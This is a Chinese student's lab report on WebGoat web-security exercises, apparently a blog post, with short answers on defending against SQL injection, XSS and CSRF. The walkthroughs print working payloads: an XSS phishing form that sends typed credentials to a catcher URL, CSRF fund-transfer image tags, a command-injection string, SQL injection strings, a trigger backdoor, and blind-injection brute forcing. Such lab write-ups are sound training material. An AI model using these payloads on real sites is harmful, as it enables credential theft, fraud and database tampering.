20145215《网络对抗》Exp9 Web安全基础实践

基础问题回答

  1. SQL注入攻击原理,如何防御?

    • SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。
    • 对于SQL注入攻击的防范,我觉得主要还是应该从代码上入手:
      • 采用预编译语句集PreparedStatement,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可。它的原理就是sql注入只对sql语句的准备(编译)过程有破坏作用,而PreparedStatement已经准备好了,执行阶段只是把输入串作为数据处理,而不再对sql语句进行解析准备,因此也就避免了sql注入问题;
      • 使用正则表达式过滤传入的参数,对一些包含sql注入的关键字进行过滤;
      • 采用字符串过滤的方法;
      • jsp中调用该函数检查是否包含非法字符,防止SQL从URL注入。
  2. XSS攻击的原理,如何防御?

    • XSS是代码注入的一种,它允许恶意用户将代码注入到网页上,并能够被浏览器成功的执行,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。XSS攻击的主要目的是,想办法获取目标攻击网站的cookie,因为有了cookie相当于有了seesion,有了这些信息就可以在任意能接进互联网的pc登陆该网站,并以其他人的身份登陆,做一些破坏。
    • XSS的防御可以从以下两方面来进行:
      • 一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤;
      • 检查用户输入的内容中是否有非法内容,如尖括号、引号等,严格控制输出。
  3. CSRF攻击原理,如何防御?

    • 我们知道XSS是跨站脚本攻击,就是在用户的浏览器中执行攻击者的脚本,来获得其cookie等信息。而CSRF是借用用户的身份,向web server发送请求,因为该请求不是用户本意,所以称为“跨站请求伪造”。
    • 对于CSRF的防御也可以从以下几个方面入手:
      • 通过referer、token或者验证码来检测用户提交;
      • 尽量不要在页面的链接中暴露用户隐私信息,对于用户修改删除等操作最好都使用post操作;
      • 避免全站通用的cookie,严格设置cookie的域。

实践内容

目录

关于WebGoat

  • WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,目前提供的训练课程有很多,包含了XSS、线程安全、SQL注入等,我们本次的实验就是在WebGoat平台上进行。
  1. WebGoat分为简单版和开发板,简单版是个Java的Jar包,只需要有Java环境即可,我们在命令行里执行:java -jar webgoat-container-7.0.1-war-exec.jar运行WebGoat:

  2. WebGoat使用8080端口,所以在浏览器上访问localhost:8080/WebGoat,进入WebGoat之后,可以看到有很多题目来让我们进行练习。

Cross-Site Scripting(XSS)练习

Phishing with XSS

  1. 这个题目我们要在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点。我们先创建一个form,让受害人在我们创建的form中填写用户名和密码,再添加一段JavaScript代码,读取受害人输入的用户名和密码,并且将这些信息发送给http://localhost:8080/WebGoat/catcher?PROPERTY=yes...,完整的XSS攻击代码如下:
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
  1. 在搜索框中输入攻击代码后点击搜索,会看到一个要求输入用户名密码的表单,如图所示:

  2. 输入用户名密码,点击登录,WebGoat会将你输入的信息捕获并反馈给你:

  3. 攻击成功!

Stored XSS Attacks

  1. 我们的目标是要创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容,这个很容易啊,在上个实验中我们也做过,直接在title里随便输点啥,然后在message中输入一串代码,比如:<script>alert("lxm attack succeed!");</script>
  2. 提交后,再次点击刚刚创建的帖子,成功弹出窗口,说明攻击成功:

Reflected XSS Attacks

  1. 当我们输入错误用户信息后,服务器校验输入有误,返回错误页面并将错误内容展示给我们看:

  2. 这时如果我们将带有攻击性的URL作为输入源,例如依旧输入<script>alert("lxm attack succeed!");</script>,就会弹出对话框:

  3. 虽然这个效果和上一个存储型XSS实验的效果类似,但是两者所用的原理不一样,存储型XSS是持久化的,代码是存储在服务器中,比较典型的例子就是上面所用的留言板,而这个实验中用的是反射型XSS攻击是非持久化的,应用的场景比如欺骗用户自己去点击链接才能触发XSS代码,也就是说它的代码是不存在服务器中的,所以一般来说存储型XSS攻击危害更大。

Cross Site Request Forgery(CSRF)

  1. 我们的目的是要写一个URL诱使其他用户点击,从而触发CSRF攻击,我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。

  2. 我们在message框中输入这样一串代码:<img src="http://localhost:8080/WebGoat/attack?Screen=277&menu=900&transferFunds=4000"/>,注意这里面的Screen和menu的值每个人的电脑可能不一样,可以在当前页面的右边有个Parameters进行查看:

  3. 提交后,会在消息列表中看到一个新的消息,点击该消息,当前页面就会下载这个消息并显示出来,转走用户的4000元,从而达到CSRF攻击的目的。

CSRF Prompt By-Pass

  1. 我们依旧和上一个一样要构造CSRF攻击,不过这次其包括了两个请求,一是转账请求,二是确认转账成功请求,即需要额外传递两个参数给服务器(transferFunds=4000,transferFunds=CONFIRM)

  2. 一开始我是直接在message中写入了攻击代码,但是没有成功,于是我换了一种方法,先在浏览器中手动输入URL:localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000进入确认转账请求页面:

  3. 之后看了一下网页的源代码,发现transferFunds的值变成了CONFIRM

  4. 于是点击了CONFIRM按钮之后,再在浏览器中输入URL:localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=CONFIRM,成功转走了5000元:

Injection Flaws练习

Command Injection

  1. 这个题是要求能够在目标主机上执行系统命令,我们可以通过火狐浏览器下的一个扩展Firebug(就是右上角的小虫的标志)对源代码进行修改,例如在BackDoors.help旁边加上"& netstat -an & ipconfig"

  2. 之后在下拉菜单中能看到我们修改后的值:

  3. 选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:

Numeric SQL Injection

  1. 我们要通过注入SQL字符串的方式查看所有的天气数据,我们上次实验做过类似的,只要加上一个1=1这种永真式即可达到我们的目的,依旧利用firebug,在任意一个值比如101旁边加上or 1=1

  2. 选中Columbia,点Go,可以看到所有天气数据:

Log Spoofing

  1. 我们输入的用户名会被追加到日志文件中,所以我们可以使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”,在User Name文本框中输入lxm%0d%0aLogin Succeeded for username: admin,其中%0d是回车,%0a是换行符:

  2. 如图所示,攻击成功:

String SQL Injection

  1. 还是和之前一样,基于select语句构造SQL注入字符串,在文本框中输入' or 1=1 --

  2. Go,攻击成功,所有用户信息都被显示出来:

LAB:SQL Injection(Stage 1:String SQL Injection)

  1. 以用户Neville登录,在密码栏中输入' or 1=1 --进行SQL注入,但是登录失败:

  2. 后面查看了一下网页源码,发现输入框对输入的字符长度进行了限制,最多只允许输入8个字符:

  3. 对字符长度进行修改,然后重新登录,登录成功:

LAB:SQL Injection(Stage 3:Numeric SQL Injection)

  1. 我们还是用上一题的办法先以用户名Larry登录,登录之后看到浏览员工信息的按钮是ViewProfile

  2. 在网页代码中分析一下这个按钮,发现这个地方是以员工ID作为索引传递参数的,我们要达到通过Larry来浏览老板账户信息的目的,一般来说老板的工资都应该是最高的,所以把其中的value值改为101 or 1=1 order by salary desc --,这样老板的信息就会被排到第一个:

  3. 之后就可以查看到老板的信息:

Database Backdoors

  1. 先输一个101,得到了该用户的信息:

  2. 可以发现输入的语句没有验证,很容易进行SQL注入,输入注入语句:101; update employee set salary=10000,成功把该用户的工资涨到了10000:

  3. 接下来使用语句101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145215@163.com' WHERE userid = NEW.userid创建一个后门,把表中所有的邮箱和用户ID都设为我的:

Blind Numeric SQL Injection

  1. 我们的目标是找到pins表中cc_number字段值为1111222233334444的记录中pin字段的数值,从服务端页面返回的信息中可以知道,它只告诉你两种信息:帐号有效或无效,我们可以先输入语句101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 ); 查看pin数值是否大于10000:

  2. 之后慢慢缩小范围,最终可以确定pin的值在2000到2500之间,然后打开BurpSuite,关于BurpSuite代理的设置,大家可以参考zqh的博客,或者自己百度,比较简单。

  3. 设置好代理后,抓个包然后send to intruder进行暴力破解,因为我们只需要将载荷注入到一个地方,所以使用sniper模式,再选择攻击的位置,先Clear一下,把它默认的攻击位置全部取消,如图所示再选中account_number后面的值点击Add

  4. 选好攻击位置后要设置载荷,由于我们要进行数字类型的暴力破解,所以选择载荷类型为Numbers,步长为1,再设置从2000到2500进行,设置完成后开始攻击:

  5. 可以看到2364的报文长度明显和其他不一样,那这个值就应该就是2364:

  6. 将这个值输入到网页中,成功:

实验总结与体会

  • 做这些题目其实很有意思,结合了一些情景,让我们更加接近于实战。这次做的只是关于Web安全,还有很多其他方面的,比如逆向、密码等,之前也做过一些类似CTF的题目,虽然有的时候做出一道题目需要脑洞比较大,但是做得多了之后就会发现其实也没有那么难想到,因为很多套路你慢慢在做题中就能领悟到,我觉得做题的过程也是一个人思考的过程,就算实在没想出来最后看了别人写的writeup也会很受启发,经历了思考的东西永远都是印象最深的。

20145215《网络对抗》Exp9 Web安全基础实践的更多相关文章

  1. 20155211 网络对抗 Exp9 Web安全基础实践

    20155211 网络对抗 Exp9 Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? 原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语 ...

  2. 20145225唐振远《网络对抗》 Web安全基础实践

    20145225唐振远<网络对抗>Web安全基础实践 参考博客:20145215 卢肖明 基础问题回答 (1)SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web ...

  3. 20155326《网络对抗》Web安全基础实践

    20155326<网络对抗>Web安全基础实践 实验后回答的问题 SQL注入攻击原理,如何防御? 原理:SQL注入攻击指的是在Web应用对后台数据库查询语句处理存在的安全漏洞,通过构建特殊 ...

  4. 20145308 《网络对抗》Web安全基础实践 学习总结

    20145308 <网络对抗> Web安全基础实践 学习总结 实验内容 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 基础问题回答 (1)SQL注入攻击原理, ...

  5. 20145326蔡馨熤《网络对抗》—— Web安全基础实践

    20145326蔡馨熤<网络对抗>—— Web安全基础实践 1.实验后回答问题 (1)SQL注入攻击原理,如何防御. 原理: SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程 ...

  6. 20155206《网络对抗》Web安全基础实践

    20155206<网络对抗>Web安全基础实践 实验后问题回答 (1)SQL注入攻击原理,如何防御 攻击原理:SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查 ...

  7. 20155305《网络对抗》Web安全基础实践

    20155305<网络对抗>Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? 原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL ...

  8. 20155307《网络对抗》Web安全基础实践

    20155307<网络对抗>Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? 原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL ...

  9. 20155311《网络对抗》Web安全基础实践

    20155311<网络对抗>Web安全基础实践 基础问题回答 SQL注入攻击原理,如何防御? 原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL ...

  10. 20155338《网络对抗》Web安全基础实践

    20155338<网络对抗>Web安全基础实践 实验过程 WebGoat 在终端中输入 java -jar webgoat-container-7.0.1-war-exec.jar 开启W ...

随机推荐

  1. Python-集合-17

    ''' 集合:可变的数据类型,他里面的元素必须是不可变的数据类型,无序,不重复. {} ''' set1 = set({1,2,3}) # set2 = {1,2,3,[2,3],{'name':'a ...

  2. VIM编辑器常用命令(转)

    转自:https://www.cnblogs.com/Nice-Boy/p/6124177.html

  3. [转] Linux有问必答:如何修复“sshd error: could not load host key”

    编译自:http://ask.xmodulo.com/sshd-error-could-not-load-host-key.html作者: GOLinux 本文地址:https://linux.cn/ ...

  4. java mail session使用Properties的clone方法

    /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreem ...

  5. AntDesign从入门到精通

    第一 设计原则 官方网址:https://ant.design/index-cn 需要做出更好的设计决策,给予研发团队一种高确定性.低熵值的研发状态.同时,不同设计者在充分理解业务述求后,基于 Ant ...

  6. ubuntu iftop工具安装和参数

    安装iftop有很多依赖关系: sudo apt-get install flex bison wget http://www.tcpdump.org/release/libpcap-1.5.3.ta ...

  7. ELK--filebeat nginx模块

    Nginx模块 该nginx模块解析由Nginx HTTP服务器创建的访问和错误日​​志 . 当你运行这个模块的时候,它会执行一些任务: 设置日志文件的默认路径(但不用担心,可以覆盖默认值) 确保每个 ...

  8. BZOJ3729Gty的游戏——阶梯博弈+巴什博弈+非旋转treap(平衡树动态维护dfs序)

    题目描述 某一天gty在与他的妹子玩游戏.妹子提出一个游戏,给定一棵有根树,每个节点有一些石子,每次可以将不多于L的石子移动到父节点,询问将某个节点的子树中的石子移动到这个节点先手是否有必胜策略.gt ...

  9. BZOJ3417[Poi2013]Tales of seafaring——BFS

    题目描述 Young Bytensson loves to hang out in the port tavern, where he often listens to the sea dogs te ...

  10. day21 re模块

    引入方式 import re 方法 .findall() 找所有的,返回所有的结果然后放在列表中 ret = re.findall("[a-z]+","yangtuo t ...